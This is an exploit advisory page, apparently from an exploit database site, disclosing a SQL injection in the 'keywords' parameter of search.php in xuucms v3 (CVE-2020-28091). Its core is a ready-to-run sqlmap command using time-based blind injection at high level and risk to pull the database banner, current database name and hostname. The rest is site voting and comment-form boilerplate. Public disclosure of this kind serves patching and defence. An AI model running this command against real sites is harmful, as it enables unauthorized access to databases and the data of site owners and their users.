xuucms 3 SQL Injection

2020.11.22
Credit: icekam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: xuucms 3 - 'keywords' SQL Injection # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.cxuu.top/ # Software Link: https://github.com/cbkhwx/cxuucmsv3 # Version: cxuucms - v3 # CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1 Use SQLMAP authentication: sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top